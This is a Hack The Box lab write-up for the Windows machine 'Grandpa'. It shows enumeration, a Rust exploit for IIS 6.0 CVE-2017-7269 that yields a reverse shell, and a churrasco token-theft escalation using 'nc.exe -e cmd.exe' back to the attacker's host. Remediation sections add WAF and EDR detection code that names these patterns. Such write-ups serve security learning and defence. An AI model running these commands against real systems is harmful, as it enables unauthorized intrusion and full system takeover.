Grandpa - HTB Easy Machine

OS Windows
Difficulty Easy
User Owns 20.1K
Root Owns 20.5K
Rating 4.5/5
Release 2017/04/12
Creator ch4p
First Blood User v4l3r0n
First Blood Root v4l3r0n

About

Grandpa is one of the simpler machines on Hack The Box, however it covers the widely-exploited CVE-2017-7269. This vulnerability is trivial to exploit and granted immediate access to thousands of IIS servers around the globe when it became public knowledge.

Exploitation

Enumeration

The initial Nmap scan revealed that only port 80 was open, serving a web page via Microsoft-IIS/6.0. This server version, associated with Windows Server 2003, is quite old and often a good indicator of potential vulnerabilities.

PORT   STATE SERVICE VERSION  
80/tcp open  http    Microsoft IIS httpd 6.0  
|_http-title: Under Construction  
|_http-server-header: Microsoft-IIS/6.0  
| http-methods:    
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH  
| http-webdav-scan:    
|   Server Type: Microsoft-IIS/6.0  
|   WebDAV type: Unknown  
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK  
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH  
|_  Server Date: Tue, 30 Sep 2025 00:25:49 GMT  
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

The Nmap script output also highlighted several enabled HTTP methods, such as PROPFIND, PUT, and MOVE. These methods are part of the WebDAV (Web Distributed Authoring and Versioning) extension, which, if not properly configured, can open up attack vectors for uploading files or manipulating server resources. This was a significant finding to keep in mind.

Navigating to the web page presented a simple "Under Construction" message.


To uncover any hidden content, I ran feroxbuster for directory enumeration. The scan successfully identified two interesting directories: /images/ and /_private/.

feroxbuster -u http://10.10.10.14 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --depth 2 --dont-extract-links -x 404

301      GET        2l       10w      149c http://10.10.10.14/images => http://10.10.10.14/images/  
301      GET        2l       10w      149c http://10.10.10.14/Images => http://10.10.10.14/Images/  
301      GET        2l       10w      149c http://10.10.10.14/IMAGES => http://10.10.10.14/IMAGES/  
403      GET       29l      188w     1529c http://10.10.10.14/_private  

However, attempting to browse to either directory resulted in a "403 Forbidden" error, indicating I didn't have the necessary permissions to view their contents. A quick check of the page's source code yielded nothing of value.


With directory enumeration hitting a dead end, the most promising path forward was to research known exploits for Microsoft-IIS/6.0. A quick search led to CVE-2017-7269. This is a critical vulnerability in the WebDAV service, the same service hinted at by the PROPFIND method found earlier. It is a stack-based buffer overflow (CWE-121) that can be triggered by a specially crafted PROPFIND request, allowing an unauthenticated attacker to achieve remote code execution.

Foothold

While several public exploits exist for this CVE, I decided to create my own as an opportunity to practice my Rust programming skills. The resulting tool can be found in this repository.

After setting up a Netcat listener, I ran the exploit against the target.

┌── ➤ cve-2017-7269  
└─ [master*]$ cargo run -- --rhost 10.10.10.14 --rport 80 --lhost 10.10.16.4 --lport 9001  
   Finished `dev` profile [unoptimized + debuginfo] target(s) in 0.01s  
    Running `target/debug/cve-2017-7269 --rhost 10.10.10.14 --rport 80 --lhost 10.10.16.4 --lport 9001`  
[+] Building shellcode for LHOST=10.10.16.4 LPORT=9001  
[+] Building HTTP trigger with shellcode length: 1744  
[+] Connecting to target: 10.10.10.14:80  
[+] Connection established.  
[+] Sending HTTP trigger...  
[+] Sending main shellcode...  
[+] Payload sent successfully!  
[+] Check your listener on 10.10.16.4:9001 for a reverse shell.

The exploit worked, and a reverse shell connected back to my listener, granting me access as the nt authority\network service user.

┌── ➤ grandpa  
└─ $ nc -lvnp 9001                                                                 
Listening on 0.0.0.0 9001  
Connection received on 10.10.10.14 1031  
Microsoft Windows [Version 5.2.3790]  
(C) Copyright 1985-2003 Microsoft Corp.  
  
c:\windows\system32\inetsrv>whoami  
whoami  
nt authority\network service

This user account has limited privileges. As expected, attempting to access sensitive directories, such as the Harry user's profile, resulted in an "Access is denied" error. The next step is to find a way to escalate privileges.

C:\Documents and Settings>cd Harry  
cd Harry  
Access is denied.

Privilege Escalation

With a low-privilege shell as network service, the next objective was to escalate to a higher-privileged account. The first step in any Windows privilege escalation scenario is to gather detailed information about the host.

Running systeminfo confirmed the machine was an unpatched Windows Server 2003 (Service Pack 2), which is notoriously full of vulnerabilities.

c:\windows\system32\inetsrv>systeminfo  
systeminfo  
  
Host Name:                 GRANPA  
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edi  
tion  
OS Version:                5.2.3790 Service Pack 2 Build 3790  
OS Manufacturer:           Microsoft Corporation  
OS Configuration:          Standalone Server  
OS Build Type:             Uniprocessor Free  
Registered Owner:          HTB  
Registered Organization:   HTB  
Product ID:                69712-296-0024942-44782  
Original Install Date:     4/12/2017, 5:07:40 PM  
System Up Time:            0 Days, 0 Hours, 23 Minutes, 57 Seconds  
System Manufacturer:       VMware, Inc.  
System Model:              VMware Virtual Platform  
System Type:               X86-based PC  
Processor(s):              1 Processor(s) Installed.  
                          [01]: x86 Family 25 Model 1 Stepping 1 AuthenticA  
MD ~2445 Mhz  
BIOS Version:              INTEL  - 6040000  
Windows Directory:         C:\WINDOWS  
System Directory:          C:\WINDOWS\system32  
Boot Device:               \Device\HarddiskVolume1  
System Locale:             en-us;English (United States)  
Input Locale:              en-us;English (United States)  
Time Zone:                 (GMT+02:00) Athens, Beirut, Istanbul, Minsk  
Total Physical Memory:     1,023 MB  
Available Physical Memory: 765 MB  
Page File: Max Size:       2,470 MB  
Page File: Available:      2,305 MB  
Page File: In Use:         165 MB  
Page File Location(s):     C:\pagefile.sys  
Domain:                    HTB  
Logon Server:              N/A  
Hotfix(s):                 1 Hotfix(s) Installed.  
                          [01]: Q147222  
Network Card(s):           N/A

A quick registry query also revealed an extremely outdated .NET version.

c:\windows\system32\inetsrv>reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"    
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"    
  
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v1.1.4322

To automate the search for kernel exploits, I saved the systeminfo output and fed it into wesng (Windows Exploit Suggester - Next Generation).

wes --update

wes systeminfo -o systeminfo.csv

The tool returned a long list of potential vulnerabilities. After filtering for exploits that cause "Elevation of Privilege" and affect IIS 6.0 on Service Pack 2, I initially focused on CVE-2009-1122 and CVE-2009-1535. Unfortunately, the available PoCs for these failed to work.


After hitting this dead end, a hint from 0xdf's blog pointed me toward a different exploit: churrasco.exe. This tool leverages CVE-2009-0078, a vulnerability in how Windows handles service isolation. It exploits the fact that processes running under the same service account (like NetworkService) are not properly isolated, allowing a malicious process to access the resources of another and ultimately steal a higher-privileged token, like that of the SYSTEM account.

To execute the plan, I first needed to transfer churrasco.exe and nc.exe to the victim machine. The most straightforward method was to set up an SMB share on my attacker machine using Impacket's smbserver.py.

First, I created a local directory and placed the necessary files inside it.

mkdir smb
cp /usr/share/seclists/Web-Shells/FuzzDB/nc.exe smb/
mv churrasco.exe smb/churrasco.exe

Next, I started the SMB server to share the directory's contents.

sudo smbserver.py share smb

From the victim shell, I navigated to a world-writable directory (C:\wmpub) and copied the files from my share.

C:\wmpub>copy \\10.10.16.4\share\nc.exe nc.exe  
copy \\10.10.16.4\share\nc.exe nc.exe  
       1 file(s) copied.
C:\wmpub>copy \\10.10.16.4\share\churrasco.exe c.exe  
copy \\10.10.16.4\share\churrasco.exe c.exe  
       1 file(s) copied.

With the tools in place, I started a new Netcat listener on port 9002 to catch the privileged shell.

┌── ➤ grandpa  
└─ $ nc -lvnp 9002  
Listening on 0.0.0.0 9002

Finally, I executed churrasco.exe, instructing it to run a command that would spawn a new reverse shell back to my machine.

C:\wmpub>.\c.exe -d "C:\wmpub\nc.exe -e cmd.exe 10.10.16.4 9002"  
.\c.exe -d "C:\wmpub\nc.exe -e cmd.exe 10.10.16.4 9002"  
/churrasco/-->Current User: NETWORK SERVICE    
/churrasco/-->Getting Rpcss PID ...  
/churrasco/-->Found Rpcss PID: 668    
/churrasco/-->Searching for Rpcss threads ...  
/churrasco/-->Found Thread: 672    
/churrasco/-->Thread not impersonating, looking for another thread...  
/churrasco/-->Found Thread: 676    
/churrasco/-->Thread not impersonating, looking for another thread...  
/churrasco/-->Found Thread: 684    
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x730  
/churrasco/-->Getting SYSTEM token from Rpcss Service...  
/churrasco/-->Found NETWORK SERVICE Token  
/churrasco/-->Found NETWORK SERVICE Token  
/churrasco/-->Found LOCAL SERVICE Token  
/churrasco/-->Found SYSTEM token 0x728  
/churrasco/-->Running command with SYSTEM Token...  
/churrasco/-->Done, command should have ran as SYSTEM!

The exploit succeeded, and a new shell connected back to my listener, this time with full nt authority\system privileges.

┌── ➤ grandpa  
└─ $ nc -lvnp 9002  
Listening on 0.0.0.0 9002  
Connection received on 10.10.10.14 1039  
Microsoft Windows [Version 5.2.3790]  
(C) Copyright 1985-2003 Microsoft Corp.  
  
C:\WINDOWS\TEMP>whoami
whoami  
nt authority\system

From here, I just needed to navigate to the user directories and retrieve the flags.

USER

C:\Documents and Settings\Harry\Desktop>type user.txt  
type user.txt  
bdff5ec67c3cff....

ROOT

C:\Documents and Settings\Administrator\Desktop>type root.txt  
type root.txt  
9359e905a2c35f....

Vulnerability Analysis

CVE-2017-7269: Remote Code Execution in IIS 6.0

The initial compromise was possible because the server was running Microsoft IIS 6.0 on Windows Server 2003, a combination that is long past its end-of-life. The enabled WebDAV extension on this version contained a critical, unpatched vulnerability. This allowed an unauthenticated attacker on the network to send a specially crafted PROPFIND request, triggering a buffer overflow and achieving remote code execution.

This exploit is a direct result of CWE-121: Stack-based Buffer Overflow. This weakness occurs when a program writes more data to a buffer located on the stack than is allocated for that buffer. The excess data overwrites adjacent memory, which can corrupt program data, crash the application, or, as in this case, overwrite the instruction pointer to redirect program execution to malicious shellcode provided by the attacker. The overarching issue, however, is CWE-937: Use of Component with Known Vulnerabilities, as the software in use was widely known to be insecure.

CVE-2009-0078: Privilege Escalation via Service Isolation Flaw

After gaining a foothold, privilege escalation to NT AUTHORITY\SYSTEM was achieved by exploiting a local vulnerability in the Windows Server 2003 kernel. The operating system failed to properly isolate processes that were running under the same low-privileged service account (in this case, NETWORK SERVICE). This allowed an exploit (churrasco.exe) to interact with other system processes and steal a high-privilege security token.

This demonstrates CWE-266: Incorrect Privilege Assignment. The vulnerability allowed a process to improperly acquire the permissions and identity of a more privileged process (SYSTEM). Modern operating systems implement stricter security boundaries and process isolation mechanisms specifically to prevent this type of token theft and privilege escalation, highlighting a fundamental design flaw in the legacy OS.

Vulnerability Remediation

Mitigating Remote Code Execution (CVE-2017-7269)

The most effective defense is to decommission legacy systems. Windows Server 2003 and IIS 6.0 are unsupported and should be migrated to a modern, supported platform like Windows Server 2019/2022 and a current version of IIS. Continuing to use end-of-life software exposes an organization to unacceptable risk.

If immediate decommissioning is not possible, apply the principle of least functionality. Disable any unused or non-essential services and components, such as the WebDAV extension, to significantly reduce the server's attack surface. All public-facing systems should be placed behind a properly configured Web Application Firewall (WAF) that can inspect traffic for malicious patterns.
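As an added example of the traffic pattern a WAF in front of this server would need to catch (this is not code from the original writeup or from the exploit repository): the public exploit for CVE-2017-7269 carries its overflow in an oversized, non-ASCII `If:` header on a PROPFIND request, so a pre-filter that inspects that header flags the trigger shape before it reaches IIS. The length thresholds and the sample requests are constructed for illustration.

```python
# Heuristic pre-filter for CVE-2017-7269 style PROPFIND requests (added example).
# Assumption: the overflow is delivered in the If: header, as in the public exploit;
# the thresholds below are constructed for illustration, not tuned values.
MAX_IF_HEADER_LEN = 512        # legitimate If: headers hold short lock tokens / ETags
MAX_TARGET_LEN = 2048


def parse_request(raw):
    """Split raw HTTP request text into (method, target, {header-name: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        raise ValueError("malformed request line")
    method, target, _version = parts
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def inspect_request(raw):
    """Return the reasons a request looks like a CVE-2017-7269 trigger
    (an empty list means nothing suspicious was found)."""
    method, target, headers = parse_request(raw)
    reasons = []
    if method.upper() != "PROPFIND":
        return reasons
    if_hdr = headers.get("if", "")
    if len(if_hdr) > MAX_IF_HEADER_LEN:
        reasons.append("oversized If header (%d chars)" % len(if_hdr))
    if any(ord(c) > 0x7F for c in if_hdr):
        reasons.append("non-ASCII characters in If header")
    if len(target) > MAX_TARGET_LEN:
        reasons.append("oversized request target")
    return reasons


# Constructed samples: a normal locked-resource PROPFIND and a trigger-shaped one.
BENIGN = ("PROPFIND /docs/ HTTP/1.1\r\nHost: example.test\r\nDepth: 1\r\n"
          "If: <http://example.test/docs/> (<opaquelocktoken:f81d4fae-7dec>)\r\n\r\n")
SUSPICIOUS = ("PROPFIND / HTTP/1.1\r\nHost: example.test\r\n"
              "If: <http://localhost/" + "\u00e5" * 700 + ">\r\n\r\n")

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(name, inspect_request(req) or "clean")
```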

Mitigating Local Privilege Escalation (CVE-2009-0078)

Upgrading the operating system is the only definitive fix for this class of kernel vulnerability. Modern versions of Windows have fundamentally redesigned process isolation and token handling, rendering exploits like churrasco ineffective.

Implement robust endpoint security. An Endpoint Detection and Response (EDR) solution would likely have detected the suspicious activity, such as the dropping of nc.exe and churrasco.exe onto the disk, unusual process execution by a web service account, and the creation of a reverse shell.
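To make the EDR point concrete, here is an added example (not code from the original writeup) of detection rules run over process-creation events shaped like the chain above: a shell spawned by the IIS worker, a dropped binary executed by the web service account from a writable directory, a netcat reverse-shell command line, and a child process running as SYSTEM under a NETWORK SERVICE parent. The events are constructed, and the IIS worker process is assumed to be w3wp.exe.

```python
# Detection rules for the Grandpa post-exploitation chain (added example).
# Events are constructed to mimic Sysmon/EDR process-creation records with
# pid, ppid, user, parent_image, image and command_line fields.
WEB_SERVICE_ACCOUNTS = {"nt authority\\network service", "nt authority\\local service"}
IIS_PARENTS = {"w3wp.exe", "inetinfo.exe"}          # IIS worker / IIS 6 host process
WRITABLE_DIRS = ("c:\\wmpub\\", "c:\\windows\\temp\\", "c:\\inetpub\\wwwroot\\")


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def scan(events):
    """Run the rules over events in order; return {pid: [rule names that fired]}."""
    user_of = {}      # pid -> user, so a child can be compared with its parent
    findings = {}
    for ev in events:
        user = ev["user"].lower()
        image = ev["image"].lower()
        cmd = ev["command_line"].lower()
        parent = _basename(ev["parent_image"])
        hits = []
        if parent in IIS_PARENTS and _basename(image) in ("cmd.exe", "powershell.exe"):
            hits.append("iis_worker_spawned_shell")
        if "nc.exe" in cmd and " -e " in cmd:
            hits.append("netcat_reverse_shell")
        if user in WEB_SERVICE_ACCOUNTS and image.startswith(WRITABLE_DIRS):
            hits.append("service_account_ran_dropped_binary")
        # Token theft signature: parent ran as a service account, child is SYSTEM.
        if user_of.get(ev["ppid"]) in WEB_SERVICE_ACCOUNTS and user == "nt authority\\system":
            hits.append("system_child_of_service_account")
        user_of[ev["pid"]] = user
        if hits:
            findings[ev["pid"]] = hits
    return findings


SAMPLE_EVENTS = [  # constructed: one benign event, then the chain from the writeup
    {"pid": 100, "ppid": 1, "user": "NT AUTHORITY\\SYSTEM",
     "parent_image": "C:\\WINDOWS\\system32\\services.exe",
     "image": "C:\\WINDOWS\\system32\\svchost.exe", "command_line": "svchost.exe -k netsvcs"},
    {"pid": 1600, "ppid": 1500, "user": "NT AUTHORITY\\NETWORK SERVICE",
     "parent_image": "C:\\WINDOWS\\system32\\inetsrv\\w3wp.exe",
     "image": "C:\\WINDOWS\\system32\\cmd.exe", "command_line": "cmd.exe"},
    {"pid": 1700, "ppid": 1600, "user": "NT AUTHORITY\\NETWORK SERVICE",
     "parent_image": "C:\\WINDOWS\\system32\\cmd.exe", "image": "C:\\wmpub\\c.exe",
     "command_line": 'c.exe -d "C:\\wmpub\\nc.exe -e cmd.exe 10.10.16.4 9002"'},
    {"pid": 1800, "ppid": 1700, "user": "NT AUTHORITY\\SYSTEM",
     "parent_image": "C:\\wmpub\\c.exe", "image": "C:\\wmpub\\nc.exe",
     "command_line": "C:\\wmpub\\nc.exe -e cmd.exe 10.10.16.4 9002"},
]

if __name__ == "__main__":
    print(scan(SAMPLE_EVENTS))
```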

Finally, enforce network egress filtering. The privilege escalation attack required establishing a new outbound connection for the reverse shell. A firewall policy that blocks all outbound traffic except for what is explicitly required for business functions can prevent an attacker from establishing command and control, even if they successfully run an exploit.

References

the master 0xdf
windows-iis-60-cve-2017-7269
exploit-db
CVE-2017-7269
churrasco
CWE-266
CWE-121
CWE-937